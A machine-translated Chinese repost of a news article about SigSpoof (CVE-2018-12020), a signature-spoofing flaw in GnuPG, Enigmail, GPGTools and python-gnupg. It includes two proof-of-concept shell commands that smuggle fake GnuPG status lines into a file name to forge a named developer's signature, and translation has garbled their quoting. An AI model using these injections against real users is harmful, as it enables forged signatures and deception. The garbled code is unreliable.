首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

几十年的PGP bug使得黑客可以欺骗任何人的签名

一位研究人员周三表示,对于他们的整个存在,一些世界上使用最广泛的电子邮件加密工具已经容易受到黑客攻击,黑客可以利用公钥欺骗任何人的数字签名。GnuPG,Enigmail,GPGTools和python-gnupg已全部更新,以修补关键漏洞。Enigmail和Simple Password Store也收到了两个相关欺骗错误的补丁。

数字签名用于证明加密消息的来源,数据备份或软件更新。通常,源必须使用私有加密密钥来使应用程序显示邮件或文件已签名。但是,一系列名为SigSpoof的漏洞使得在某些情况下攻击者有可能伪造签名,只不过是某人的公钥或密钥ID,而这两个漏洞通常都是在线发布的。如果没有进行法证分析,这篇文章顶部显示的欺骗性电子邮件不会被检测为恶意,这是许多用户无法做到的。

备份和软件更新也受到影响

这个漏洞被编入CVE-2018-12020,意味着许多人为敏感业务或安全问题所依赖的数十年的电子邮件实际上可能是恶搞。它也有可能影响超出加密电子邮件的用途。

发现SigSpoof的软件开发人员Marcus Brinkmann 周三发表的一份咨询报告中写道:“GnuPG中的漏洞非常深入,并且可能会影响我们大部分核心基础架构。” “GnuPG不仅用于电子邮件安全,还用于保护备份,分发软件更新以及Git等版本控制系统中的源代码。”

CVE-2018-12020仅在启用名为verbose的设置时影响易受攻击的软件,该设置用于排除错误或意外行为。没有一个易受攻击的程序默认情况下是冗长的,但在线提供的各种强烈推荐配置(包括cooperpair安全默认设置Ultimate GPG设置Ben的IT-Kommentare)都可以启用。一旦启用了详细信息,Brinkmann的帖子就包含了三个独立的概念证明欺骗攻击,这些攻击与前面提到的工具以及其他可能的工具相反。

欺骗行为通过将元数据隐藏在加密电子邮件或其他消息中,使得应用程序将其视为签名验证操作的结果。诸如Enigmail和GPGTools之类的应用程序会导致电子邮件客户端(如Thunderbird或Apple Mail)错误地显示电子邮件是由攻击者选择的某人加密签名的。欺骗签名所需要的只是拥有公钥或密钥ID。

攻击相对容易实施。Brinkmann PoC漏洞利用的代码之一是伪造Enigmail开发人员Patrick Brunschwig的数字签名:

代码语言:javascript
复制
$ echo'请寄给我一台昂贵的洗衣机。' \
| gpg --armor -r VICTIM_KEYID --encrypt --set-filename“`echo -ne \''\
\ n [GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \
\ n [GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B \
\ n [GNUPG:] TRUST_FULLY 0 classic \
\ ngpg:'\'`“> poc1.msg

第二个利用是:

代码语言:javascript
复制
echo“明天上午10点在秘密地点见你。” | gpg --armor --store --compress-level 0 --set-filename“`echo -ne \''\
\ n [GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \
\ n [GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01 \
\ n [GNUPG:] TRUST_FULLY \
\ n [GNUPG:] BEGIN_DECRYPTION \
\ n [GNUPG:] DECRYPTION_OKAY \
\ n [GNUPG:] ENC_TO 50749F1E1C02AB32 1 0 \
\ ngpg:'\'`“> poc2.msg

布林克曼告诉Ars,该错误的根源可追溯到1998年的GnuPG 0.2.2,“尽管随着更多应用程序使用GPG,其影响会有所不同,并随着时间而改变。” 只有在已知易受攻击的工具的开发者修补后,他才公开披露该漏洞。这些漏洞在GnuPG 2.2.8Enigmail 2.0.7GPGTools 2018.3python GnuPG 0.4.3中进行了修补。想知道使用OpenPGP的其他应用程序的状态的人应该与开发人员核对。

周三的漏洞披露事件发生在一个月之后,研究人员发现了一组不同的漏洞,使攻击者能够解密先前获得的使用PGP或S / MIME加密的电子邮件。Efail,因为这些错误被称为,可以在各种电子邮件程序中被利用,包括Thunderbird,Apple Mail和Outlook。

另外,Brinkmann在Enigmail和Simple Password Store中报告了两个与SigSpoof相关的漏洞,这些漏洞也使得在某些情况下可能会欺骗数字签名。即使未启用详细设置,也会触发影响Enigmail的CVE-2018-12019。它也被修补在刚发布的2.0.7版本中。同时,CVE-2018-12356让远程攻击者欺骗配置文件和扩展脚本上的文件签名,可能允许访问密码或执行恶意代码。修正在这里

  • 发表于:
  • 原文链接https://arstechnica.com/information-technology/2018/06/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

相关快讯

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券